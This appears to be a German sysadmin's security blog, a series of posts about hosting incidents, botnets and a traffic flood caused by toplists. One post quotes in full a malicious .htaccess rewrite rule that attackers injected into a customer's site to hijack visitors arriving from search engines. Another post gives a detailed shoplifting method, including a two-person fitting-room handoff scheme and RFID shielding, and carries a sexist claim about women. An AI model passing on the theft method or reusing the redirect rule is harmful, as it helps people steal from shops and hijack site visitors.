datenklause.de » Security

Grütze zippen

sirko — Fri, 23 Jul 2010 14:03:26 +0000

Ein Kollege hat das hier umgesetzt, wir haben jetzt ein viel, viel genaueres Accounting auf dem Cluster. Die Intervalle zur Auswertung sind frei wählbar.
Und einige Kunden kriegen jetzt Anrufe.
Man kann sich gar nicht vorstellen, was der ambitionierte Webmaster so alles bastelt. Zum Beispiel “Grütze zippen”: Eine Wordpress-Installation, die bei jedem Seitenaufruf ein 250MB-Backup erstellt. Was mit dem neuen Storage-System natürlich in Sekunden erledigt ist. Oder ein “Cache”, der zig-tausend mehrere Byte große Dateien anlegt, die dann zu Hunderten bei jedem Seitenaufruf nachgeladen werden.
Ich will bloss wieder zurück in der Urlaub. Machts gut.

Nach ein paar Bier am Lagerfeuer

sirko — Mon, 16 Jun 2008 08:58:37 +0000

Frauen klauen Klamotten. Der Gerechtigkeit halber fügen wir mal ein “Natürlich nicht Alle.” hinten an, aber inzwischen habe ich den Eindruck gewonnen, daß das irgendwie im zweiten X-Chromosom codiert sein muß. Abends, am Lagerfeuer, bekam ich einige Ihrer Tricks zu hören:

Die maximale Anzahl von Kleidungsstücken, die mit in die Kabine genommen werden darf, wird geflissentlich ignoriert. So verliert jeder etwaige Beobachter die Übersicht. Sie klauen nie zu oft im selben Laden. Sie kaufen auch immer etwas, da Diebstähle dann nicht so auffallen, auch nicht bei Läden mit Kameras. An den zu klauenden Klamotten darf kein Diebstahlschutz angebracht sein. Preisschilder und Plastebänzel werden unbedingt in mit in die Kabine genommenen Hosen versteckt, da diese über vier Taschen verfügen. Die Hosen werden danach natürlich zurückgebracht. Bleibt noch die Bügelfrage: Zwei Kleiderbügel werden in ein Kleidungsstück gesteckt und höchstpersönlich auf den Ständer zurückgehängt, von dem sie es geholt haben (die Kleiderstange vor den Kabinen wird oft von einer Garderobiere bewacht).
Es gibt wohl auch Einige, die sich die Magneten zum Entriegeln der Diebstahlsicherungen besorgt haben.

Als Systemadministrator interessiert mich so etwas natürlich, schließlich handelt es sich darum, Sicherheitslücken auszunutzen, diese Denkweise braucht man bei jedem Penetrationstest. Mit fiel dann auch eine Variante für Läden ein, in denen die Kabinen nicht von vorn einsehbar sind:

Man gehe mit einem Partner gleichen Geschlechts und idealerweise gleicher Konfektionsgröße auf Raubzug. Obige Regeln sind zu beachten, daher nehme man viele Klamotten mit in die Kabine. Der Partner nimmt nur ein einziges Kleidungsstück mit in die Kabine nebenan um unauffällig zu wirken. Das, was man klauen will, schiebt man einfach dem Partner oben oder unten durch. Zum Ablenken bezahlt der Partner jetzt seine Klamotte und verläßt vor uns den Laden, hat aber natürlich auch unsere Beute in der Tasche. Sollte trotzdem Verdacht auf uns gefallen sein, wird selbst eine Leibesvisitation keine Beweise liefern. Gegen eingenähte RFID-Tags helfen mit Alufolie ausgekleidete Taschen oder die bekannten RFID-Blocker vom Chaos Computer Club.

Dazu sollte ich wohl wirklich noch anmerken: Ich klaue nicht. Nie. Nervenkitzel hole ich mir beim Segeln.

Und was passiert nun mit dem Botnetz?

sirko — Sat, 01 Dec 2007 12:02:13 +0000

Daß ein Botnetz-Betreiber aufgeflogen ist, ist ja an sich erstmal eine gute Nachricht. Akill wird wohl verurteilt, aber niemand verliert ein Wort darüber, was nun mit dem Botnetz passiert. Irgendwie kann ich nicht glauben, daß es da auf Seiten einer gewissen Regierung keine Begehrlichkeiten gibt, zumal 1,3 Mio infizierte Rechner eine gewaltige Streitmacht sind, mit der man wohl jedes Netz lahmlegen können wird.
Vor einiger Zeit benutze ein Wurm unter anderem den Webspace eines unserer Kunden, dort war offenbar unter Ausnutzung einer Sicherheitslücke in den Scripten des Kunden von Dritten ein Script hinterlegt worden, welches die IP-Adressen der infizierten Systeme in einer Text-Datei speicherte. Nachdem wir uns die geographische Verteilung der IPs in den ersten Hundert Zeilen der Datei anschauten, wurde klar, daß hier innerhalb von Millisekunden weltweit eine Welle losgetreten werden sollte: Jede IP aus einem anderen Land, in allen Kontinenten. Schwer zu glauben, daß so etwas das Werk eines Hobby-Fricklers sein soll. Auf der anderen Seite, wenn es kein Hobby-Frickler gewesen sein soll, warum benutzte er dann irgendwelche Shared-Hosting-Webserver zum Identifizieren der infizierten Systeme? Denn man kann doch davon ausgehen, daß die dafür zuständigen Administratoren diese Webseiten sofort sperren oder falls nicht, diese unter der Last der Anfragen schlicht zusammenbrechen. Es sei denn, der Author des Trojaners kontrolliert einen Server in der Infrastruktur VOR diesen Servern. Aber diesen Fall will ich mir gar nicht weiter ausmalen. Heute kommunizieren die Botnetze ja sowieso durch Peer-to-Peer-Kommunikation.

Cracker haben neue Masche

sirko — Thu, 16 Aug 2007 10:06:41 +0000

Ein Kunde bekam durch ein Leck in seinem CMS unwissentlich neue Regeln in seine .htaccess hinzugefügt:

RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z]+\.)?(google|msn|yahoo)\. [NC] RewriteCond %{HTTP_REFERER} [?&](q|query|searchfor|w|p)\= RewriteCond %{HTTP_REFERER} ![?&](q|query|searchfor|w|p)\=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <57 RewriteRule ^.*$ /extern/jit/oruz/t.htm [L]

Ruft der Kunde seine Seite ganz normal auf, merkt er nichts von seinem neuen Untermieter. Nur wenn er auf einen Link in einer der Suchmaschinen klickt, der eigentlich auf seine Seite führen soll, landet er woanders. Fies.

Bind DNS Cache Poisioning

sirko — Fri, 27 Jul 2007 14:46:50 +0000

Das war abzusehen. Bei unseren Nameservern stieg die CPU-Last heute ganz erheblich an. Und diese Peaks lassen auch nichts Gutes erahnen…

DDOS oder Kiddies?

sirko — Tue, 10 Jul 2007 11:26:42 +0000

Nachdem wir heute wieder mal von einer IP aus China mit 25MBit gefakten HTTP-Requests zugeballert wurden (pf sei Dank kommt sowas nie bis zu den Webservern durch), hier eine kurze Anekdote über eine vermeintliche kleine DDOS-Attacke.

Tausende verschiedene Rechner, vornehmlich aus dem Netz der TurkTelekom machten massenhaft Anfragen auf eine Web-Präsenz eines unserer Kunden.

Technisch haben wir das dann so gelöst, daß mod_evasive und mod_security diese Rechner erkannt und die IPs mit einem schnell geschriebenen Programm an die Firewall vor dem Load Balancer geschickt haben. Dort wurden sie dann für eine Stunde ausgesperrt. Funktionierte tadellos, der Regelbetrieb war schnell wieder gewährleistet, es waren ja auch nur ein paar Tausend Rechner.

Ich dachte erst an eine kleine DDOS-Attacke, dann offenbarte sich aber langsam, daß dies die Auswirkungen einer simplen Top100-List waren.

Besagter Kunde betrieb auf seiner Seite eine solche Top-List. Diese Top-List wurde offenbar von anderen Webmastern in eine Seite integriert, die auch hunderte anderer Top-Listen lädt. Diese Webmaster haben Domains weltweit bei verschiedenen Registraren teilweise mit offensichtlich falschen WHOIS-Daten registriert. Und anscheinend schaffen Sie es irgendwie, die Anzahl der Besucher für diese Massen-Toplist-Seiten immer weiter zu erhöhen.

Mir ist nicht klar, wie genau sie das machen, so etwas ist mir noch nie begegnet. Und es beunruhigt mich bis heute, daß solch ein Kinderkram diese Wucht entfalten kann.

Dann waren da noch ein paar wenige IPs, die viele, viele Anfragen pro Sekunde machten. Wahrscheinlich haben sie damit den schlecht programmierten Toplists die Besucher vorgegaukelt und diese Massen an “Besuchern” erreicht. Wenn auch nur eine einzige Toplist von den Hundert auf der Seite diese Aufrufe für echt gehalten hat…

Nunja. Aufklären können wir das leider nie.